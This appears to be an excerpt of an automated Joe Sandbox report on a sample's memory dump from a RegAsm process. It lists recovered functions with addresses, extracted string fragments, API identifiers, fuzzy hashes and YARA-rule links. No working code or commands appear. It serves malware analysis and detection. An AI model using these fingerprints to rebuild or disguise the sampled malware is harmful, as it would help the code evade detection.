                                                                      • String ID: 4`[b$7654
                                                                      • API String ID: 4205145696-3675246634
                                                                      • Opcode ID: 9da582bd222a9aa3210a227d15e33794fc036b98df7b843830be9b90ece2603a
                                                                      • Instruction ID: c15c9a77a36a85870a6c8e83f66fe4480b167010d9fbe339181f0a578d0a5d72
                                                                      • Opcode Fuzzy Hash: 9da582bd222a9aa3210a227d15e33794fc036b98df7b843830be9b90ece2603a
                                                                      • Instruction Fuzzy Hash: 6BE1EE75A08301DFEB00CF68E881B6EBBB1FB8930AF14482DE985D7291D739D915CB59
                                                                      Function 0043FD0E Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 403memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: AllocString
                                                                      • String ID: ,/$4`[b$7654
                                                                      • API String ID: 2525500382-138038313
                                                                      • Opcode ID: 011e93b997d46e8870ce040462fe3f6284c17b45014897ad250b99d8540a381f
                                                                      • Instruction ID: 5c24870ec86159d0f6ecf84723dde93076e3ef2f57b7b7e0ddad74c94e93c31d
                                                                      • Opcode Fuzzy Hash: 011e93b997d46e8870ce040462fe3f6284c17b45014897ad250b99d8540a381f
                                                                      • Instruction Fuzzy Hash: F1E1D075A08301AFEB10CF64DC41B6EBBB1FB89305F14482DF685AB291D739D911CB5A
                                                                      Function 00401000 Relevance: 11.9, Strings: 8, Instructions: 1867COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$A$gfff$gfff$gfff
                                                                      • API String ID: 0-2771814109
                                                                      • Opcode ID: 60d91501b71ca20af355275aac5581bd6b324532a87e7822ac95ca22a7305489
                                                                      • Instruction ID: ddca72acc18f96ceca311f167404972c65106f1bd8c402654e553bdb633caa3b
                                                                      • Opcode Fuzzy Hash: 60d91501b71ca20af355275aac5581bd6b324532a87e7822ac95ca22a7305489
                                                                      • Instruction Fuzzy Hash: CCD2E3716083418FC714CE29C59436BBBE2ABC9314F18867EE899AB3D1D778DD05CB86
                                                                      Function 00427B0F Relevance: 10.8, Strings: 8, Instructions: 813COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -17E$7654$7654$=I# $?8N$QQ;%$r~B$E'I
                                                                      • API String ID: 0-3386696674
                                                                      • Opcode ID: 37c194b4809dd1c00137d7dc201101eebe92735c8c0e734b709c7d09f5c8d5e3
                                                                      • Instruction ID: 60540d3078bd233bb59da47371b54fb6625578c4cae607adf808edf17fed4755
                                                                      • Opcode Fuzzy Hash: 37c194b4809dd1c00137d7dc201101eebe92735c8c0e734b709c7d09f5c8d5e3
                                                                      • Instruction Fuzzy Hash: 1442CB71608311DFD714DF28E880A2AB7E2FF89715F49896DE8858B392D739EC01CB56
                                                                      Function 0041DD64 Relevance: 10.6, Strings: 8, Instructions: 613COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 3_]$4`[b$4`[b$7654$8C-A$;[6Y$Vwvu${/}-
                                                                      • API String ID: 0-2602927754
                                                                      • Opcode ID: 307ad71cdb71838ec795c4dd14610299abfbd5c82a6174d8d007dc7da4c3e356
                                                                      • Instruction ID: ba1e9d66d155ef7e9119e1be78dddf6f3c512da5b59593db3145263a403de92d
                                                                      • Opcode Fuzzy Hash: 307ad71cdb71838ec795c4dd14610299abfbd5c82a6174d8d007dc7da4c3e356
                                                                      • Instruction Fuzzy Hash: C012ABB4600700DFC7248F25C891BA3B7F2FF46305F14885DE99A8B692D379E891CB99
                                                                      Function 004012A7 Relevance: 8.4, Strings: 6, Instructions: 940COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0$0$0$@$i$u
                                                                      • API String ID: 0-2200626124
                                                                      • Opcode ID: ab89587f8a0daafa244c590f772caad168a2f81082220ddc44e8abb7ed779df5
                                                                      • Instruction ID: 0f02e483ae5546116cb6baed28d9e077716f17be131def69be1fd2f2fc950076
                                                                      • Opcode Fuzzy Hash: ab89587f8a0daafa244c590f772caad168a2f81082220ddc44e8abb7ed779df5
                                                                      • Instruction Fuzzy Hash: 1472F571A0C3428BD318CE28C58471BBBE1ABC5314F148A2EE8D9A73D1D7B8DD45CB86
                                                                      Function 0042C891 Relevance: 8.3, Strings: 6, Instructions: 837COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4`[b$7654$HK$cb`d$gzyi$vrhz
                                                                      • API String ID: 0-2685429167
                                                                      • Opcode ID: 424902dc72ab28ec9b7c09e577cb145ec8479a31a11f362cc29c796f7d8e5cc8
                                                                      • Instruction ID: 3f5d2fb8fb5b53038c321c487b2321c0e33df35c546daf2f5165b83ef3f83226
                                                                      • Opcode Fuzzy Hash: 424902dc72ab28ec9b7c09e577cb145ec8479a31a11f362cc29c796f7d8e5cc8
                                                                      • Instruction Fuzzy Hash: 3A42DCB1608350DFD7009F25E89162FBBE1EF8A349F54492EE4C597352D338D910CB5A
                                                                      Function 004204A0 Relevance: 6.9, Strings: 5, Instructions: 683COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ^G$`c$[Z]$su$wy
                                                                      • API String ID: 0-2730888924
                                                                      • Opcode ID: f07032dc12982def7a5bf2984774998718f875f43970d5821979900336bb7d63
                                                                      • Instruction ID: e474b29bb85a6c259ff07e14df36c9a08649fe6536d19ea1481a43bd88640b6a
                                                                      • Opcode Fuzzy Hash: f07032dc12982def7a5bf2984774998718f875f43970d5821979900336bb7d63
                                                                      • Instruction Fuzzy Hash: 5D2296B55083509FC700EF59E881A2FBBE0AF95358F488D1DF4D48B262D37AD944CB9A
                                                                      Function 0042BB00 Relevance: 6.7, Strings: 5, Instructions: 428COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4`[b$4`[b$7654$7654$L]
                                                                      • API String ID: 0-1286059558
                                                                      • Opcode ID: 757b9c9f247dd65a548c9dc266fa73467f186f5a48385a5314f930bee4029ea9
                                                                      • Instruction ID: 287429e8acf0308d46d64af027b8c2561fec00fe66fe95d8ce0ef9e28d63c3ce
                                                                      • Opcode Fuzzy Hash: 757b9c9f247dd65a548c9dc266fa73467f186f5a48385a5314f930bee4029ea9
                                                                      • Instruction Fuzzy Hash: DAE1ADB5608344DFE3209F25E881B2FB7E5FB85345F54882DEAC887252DB3AD910CB56
                                                                      Function 0040F7E0 Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: s$6$H$M|$rF
                                                                      • API String ID: 0-3047902030
                                                                      • Opcode ID: a0a9c5e50eae0b5be39a8be490fd2323b68d1735eebcbb5389087b95049dffa7
                                                                      • Instruction ID: afb9f173eede57e33b54f2f4df428e609b2eb683b10d7af656f29c121230f651
                                                                      • Opcode Fuzzy Hash: a0a9c5e50eae0b5be39a8be490fd2323b68d1735eebcbb5389087b95049dffa7
                                                                      • Instruction Fuzzy Hash: 40D17B7050C3809BD321DF18D49462FBBE5AB82744F18493EE8D56B392D339D949CBAB
                                                                      Function 004340F5 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 452COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #,)$J(Z4
                                                                      • API String ID: 0-1033251941
                                                                      • Opcode ID: 71f396c22e8098a9a3ea3581ea4eb6afead878c0d08d22da93183c486a730162
                                                                      • Instruction ID: ee2a4b736eeb26dd3486e01a631b6fd6690cbdf8a78c7fccda172515344799a2
                                                                      • Opcode Fuzzy Hash: 71f396c22e8098a9a3ea3581ea4eb6afead878c0d08d22da93183c486a730162
                                                                      • Instruction Fuzzy Hash: E5F1D071604B40CBE7658F35D490BE7BBE2AB4A305F14886ED5EB87282CB39F505CB25
                                                                      Function 0042A345 Relevance: 4.3, Strings: 3, Instructions: 529COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,+$lk$;9
                                                                      • API String ID: 0-1734778162
                                                                      • Opcode ID: fb477b06c671ab3640e2d5caf1ace8f2a13c8c6b58880ea85eaf716b54e670fa
                                                                      • Instruction ID: c9bf8e021ae438ad3888fe5eaf2f287ab2778ae50bd9558bb26f3a013a9aec5c
                                                                      • Opcode Fuzzy Hash: fb477b06c671ab3640e2d5caf1ace8f2a13c8c6b58880ea85eaf716b54e670fa
                                                                      • Instruction Fuzzy Hash: E002A670608352CBC324DF28E58066BB3E1FF85745F98891EE8C587221E779D914DBAB
                                                                      Function 00426F20 Relevance: 4.2, Strings: 3, Instructions: 405COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4`[b$7654$defg
                                                                      • API String ID: 0-754973257
                                                                      • Opcode ID: fe4c2263e7f541097cd7e1276ef9b0ddbefc2d291b8011f9bdf8265acc152e94
                                                                      • Instruction ID: 5c7ae5f1a36bc8351c5dc06062275f31aaba2ea41b8746b841229fb7d44012db
                                                                      • Opcode Fuzzy Hash: fe4c2263e7f541097cd7e1276ef9b0ddbefc2d291b8011f9bdf8265acc152e94
                                                                      • Instruction Fuzzy Hash: C3C1AC716083209BD711EF14E881A2BB7E4EF95354F89095EF8C19B351E339D914CBAB
                                                                      Function 00408810 Relevance: 4.1, Strings: 3, Instructions: 395COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$)$IEND
                                                                      • API String ID: 0-588110143
                                                                      • Opcode ID: 5610f58ec79ad5bb0dc06f3c06bd7ab06b850017f9ba25a94eb0939a408b002b
                                                                      • Instruction ID: 88cc50b77c1398cfc1833f03bafd4b4e3e3ea05d3db966b7175162df85094bf9
                                                                      • Opcode Fuzzy Hash: 5610f58ec79ad5bb0dc06f3c06bd7ab06b850017f9ba25a94eb0939a408b002b
                                                                      • Instruction Fuzzy Hash: 09E1C171A087019FE310DF29C88071ABBE0BB94314F14463EE9D5AB3D2DB79E915CB96
                                                                      Function 004450E0 Relevance: 3.1, Strings: 2, Instructions: 576COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 7654$f
                                                                      • API String ID: 0-930265988
                                                                      • Opcode ID: 579144abd9ad0ecb759efeeddbf896163be559cf23dfe97a4952c1ee92b0f94d
                                                                      • Instruction ID: de19403edc75124fb8fa16651fcd35b7f7b8ffe125996a06d8df55fcce46686f
                                                                      • Opcode Fuzzy Hash: 579144abd9ad0ecb759efeeddbf896163be559cf23dfe97a4952c1ee92b0f94d
                                                                      • Instruction Fuzzy Hash: 6E12D1716087419FEB15CF18C880B2FBBE1ABC4314F588A2EF895873A2D739D845CB56
                                                                      Function 0042D56C Relevance: 3.1, Strings: 2, Instructions: 553COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4`[b$7654
                                                                      • API String ID: 0-3675246634
                                                                      • Opcode ID: 4ebe84494b6721855754e88454bd869297922db48c31a06956ead8982e28ba80
                                                                      • Instruction ID: 4bc0d7d0b4372d09d1f80951b4dd8e72c0f01cae245f05c3a22e09897f17cac6
                                                                      • Opcode Fuzzy Hash: 4ebe84494b6721855754e88454bd869297922db48c31a06956ead8982e28ba80
                                                                      • Instruction Fuzzy Hash: 02122370A08341DFD724CF28E89071ABBE2BF8A316F14896DE4D8973A2D775D904CB56
                                                                      Function 00403790 Relevance: 2.9, Strings: 2, Instructions: 445COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Inf$NaN
                                                                      • API String ID: 0-3500518849
                                                                      • Opcode ID: f3226641ccffb084b943e03a89841c171065b1cd8ecf88249c95162ffa2b7308
                                                                      • Instruction ID: cfcbd5781c5794fd878052524ebf2c83b7e2996ae9355b3ff982965262b6e72e
                                                                      • Opcode Fuzzy Hash: f3226641ccffb084b943e03a89841c171065b1cd8ecf88249c95162ffa2b7308
                                                                      • Instruction Fuzzy Hash: 7CE1D6B2A083019BC704CF29C48161BBBE5EBC4750F258A3EF899A73D0E774DD458B86
                                                                      Function 0041CFF0 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4`[b$7654
                                                                      • API String ID: 0-3675246634
                                                                      • Opcode ID: c0f58f158a3409f8100f4a7b6bbb32796ecc7b37d8a9628118476fa5228a5e34
                                                                      • Instruction ID: 97e3d8432fa62b873f2236c54981c5df7dc0733d72ba7613edc951da59989f30
                                                                      • Opcode Fuzzy Hash: c0f58f158a3409f8100f4a7b6bbb32796ecc7b37d8a9628118476fa5228a5e34
                                                                      • Instruction Fuzzy Hash: D7A122B1904214DBD3219F14CC42BA773B4FF51359F08456EE88A873A2E739EC50C79A
                                                                      Function 0042D58E Relevance: 2.9, Strings: 2, Instructions: 396COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4`[b$7654
                                                                      • API String ID: 0-3675246634
                                                                      • Opcode ID: e4a64c07486ec4eee9284e1d1d98adb02db342f8a0de0245d192b4abb41fb210
                                                                      • Instruction ID: 5878a3ae7455ddbe66d1b8aab6ad714c336ee248068d822dee8781cd81fb895b
                                                                      • Opcode Fuzzy Hash: e4a64c07486ec4eee9284e1d1d98adb02db342f8a0de0245d192b4abb41fb210
                                                                      • Instruction Fuzzy Hash: 01D13770A08390DFD720CF24E89075AB7E2AF9A316F18496DE4D997392D375ED04CB1A
                                                                      Function 0042C390 Relevance: 2.9, Strings: 2, Instructions: 361COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: 7654$e
                                                                      • API String ID: 2994545307-2460420260
                                                                      • Opcode ID: f7c379ae5121c6bd7f5f3bf37a8e5cd38f458bbd85b3cc10accd3093f96a0b56
                                                                      • Instruction ID: 11945eaa199fbd2feb2a77c93107578b6d38bce28f05eb1bcc10d1619140c484
                                                                      • Opcode Fuzzy Hash: f7c379ae5121c6bd7f5f3bf37a8e5cd38f458bbd85b3cc10accd3093f96a0b56
                                                                      • Instruction Fuzzy Hash: 5AA1F0716083219FD710EF14E8D0A2FB7E1EF95354F94892EE98597352E338E841CB9A
                                                                      Function 00434DF6 Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J(Z4$O<>5
                                                                      • API String ID: 0-1381569939
                                                                      • Opcode ID: 2b3eafb8382073a923ed8343f70dfa28e3e80688e5264b3e7f6cd2adb108814f
                                                                      • Instruction ID: 6565b98a73022d45040d5be856969b21091b835410caec50d7f7389bae59b378
                                                                      • Opcode Fuzzy Hash: 2b3eafb8382073a923ed8343f70dfa28e3e80688e5264b3e7f6cd2adb108814f
                                                                      • Instruction Fuzzy Hash: 78A17970508B818AE766CF39C050BA3FBE1AF1A305F54585ED4EB8B782C77AB405CB65
                                                                      Function 00437620 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00437805
                                                                      • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 004376A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                      • API String ID: 0-2492670020
                                                                      • Opcode ID: 3062d5efe69ceb85abb1b62a397233c9323a09391f451b3eb2ef24bbef9aa3a1
                                                                      • Instruction ID: 6111d259e755e12c00d3ecab6662fed1963f18ecac40f8d090cae3b405bc9ae5
                                                                      • Opcode Fuzzy Hash: 3062d5efe69ceb85abb1b62a397233c9323a09391f451b3eb2ef24bbef9aa3a1
                                                                      • Instruction Fuzzy Hash: 61610573B1D9804BDB3C9A3D4C6226A7A435FDB334B2C936AE5F2C73E1D52988018345
                                                                      Function 0042A2F9 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,+$;9
                                                                      • API String ID: 0-1035581042
                                                                      • Opcode ID: fd429c52b9270381125f2c7ff991b4681d229a7dd8ccae4c976d6f9e66088ac5
                                                                      • Instruction ID: a8d1bfba6cff5693b5a22f2e246a050cfb9519439ae3469259881602220de6ad
                                                                      • Opcode Fuzzy Hash: fd429c52b9270381125f2c7ff991b4681d229a7dd8ccae4c976d6f9e66088ac5
                                                                      • Instruction Fuzzy Hash: 24715374108390CBD7208F24D940B6BB7F1FF86305F949A1EE9D987221EB79D810CB5A
                                                                      Function 0042A274 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,+$;9
                                                                      • API String ID: 0-1035581042
                                                                      • Opcode ID: 6c514a58eddc6375df67e0e40d0af6a33b7b51b1912c0f5f1b71658d682d6659
                                                                      • Instruction ID: d75497c7bc5a3c3f258d38026d720fbab9c12da0385263baf3a294c8c598bd3d
                                                                      • Opcode Fuzzy Hash: 6c514a58eddc6375df67e0e40d0af6a33b7b51b1912c0f5f1b71658d682d6659
                                                                      • Instruction Fuzzy Hash: 7E614374108390CBD7248F24E940B6BB7F1FF86305F949A5EE9D887221EB79D810CB5A
                                                                      Function 0044AF10 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: @$MNOP
                                                                      • API String ID: 2994545307-2234187807
                                                                      • Opcode ID: e8eb8e7b710596d1c74c1b8591662db9ad2ca5a2e960669c0b6428914b1691a7
                                                                      • Instruction ID: 4cbe3da95016eb5cdb85334a5a7d98617c44c4b6d2decb90e9c5df58e2c316ea
                                                                      • Opcode Fuzzy Hash: e8eb8e7b710596d1c74c1b8591662db9ad2ca5a2e960669c0b6428914b1691a7
                                                                      • Instruction Fuzzy Hash: 773168709093009BE714DF15D880A2BBBF5EF9A319F14892EE98897351D339D914CB9A
                                                                      Function 00405400 Relevance: 1.8, Strings: 1, Instructions: 570COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %1.17g
                                                                      • API String ID: 0-1551345525
                                                                      • Opcode ID: d7b07ed70faec5ae0229b128cf20a3fd72730703604141df1a9ea8e470dfb83c
                                                                      • Instruction ID: a5a990b7d37f07a136729ee37501cef67c4ba19131cd56b77464573e07893e63
                                                                      • Opcode Fuzzy Hash: d7b07ed70faec5ae0229b128cf20a3fd72730703604141df1a9ea8e470dfb83c
                                                                      • Instruction Fuzzy Hash: 8A12D5B6A08B418BE7158E14C480727BBA2EFE0314F19867ED8596B3D1E779DC05CF4A
                                                                      Function 00426CA0 Relevance: 1.8, APIs: 1, Instructions: 255comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00426CC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInstance
                                                                      • String ID:
                                                                      • API String ID: 542301482-0
                                                                      • Opcode ID: 23a7ae71985ea26ccd963fc31c7aca8cae070c80405dbe57fff8fe91e8626e74
                                                                      • Instruction ID: aaa0f5ddf04a0fb17491854a9ed1dc8b5669499049bb0ea055afc95c03e17e5c
                                                                      • Opcode Fuzzy Hash: 23a7ae71985ea26ccd963fc31c7aca8cae070c80405dbe57fff8fe91e8626e74
                                                                      • Instruction Fuzzy Hash: 586100B53002149BDB20DB24DC92BB733B4FF81358F564519F9468B390E778E805C76A
                                                                      Function 00449390 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P
                                                                      • API String ID: 0-3110715001
                                                                      • Opcode ID: b4251f7723f8745f7b2b3e976eda3b15f31dcf2fd24cd5e3171029a2dd935bc3
                                                                      • Instruction ID: 3b4be68ae0bb154b0f5282f7702363db0b67a1e70ae851dab57422b1ed72f487
                                                                      • Opcode Fuzzy Hash: b4251f7723f8745f7b2b3e976eda3b15f31dcf2fd24cd5e3171029a2dd935bc3
                                                                      • Instruction Fuzzy Hash: DDD1F3729082609FE726CE18D88071FB6E1EB85718F15863DE8B5AB381C779DC06D7C6
                                                                      Function 00431370 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2239338010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "
                                                                      • API String ID: 0-123907689
                                                                      • Opcode ID: ebf93012f695f814ea8beb274b67aa73a9487f93ba687a60f16075264e124bcf
                                                                      • Instruction ID: 4bf39b719c747955085c095eee2413a709a75f6ba2d808f9bf0869d59952773e
                                                                      • Opcode Fuzzy Hash: ebf93012f695f814ea8beb274b67aa73a9487f93ba687a60f16075264e124bcf
                                                                      • Instruction Fuzzy Hash: D6C12872A083009BD714CF25C491B6BB7E9AF88354F1C992FE896873A2D738DD44C796
                                                                      Function 0042DEF8 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
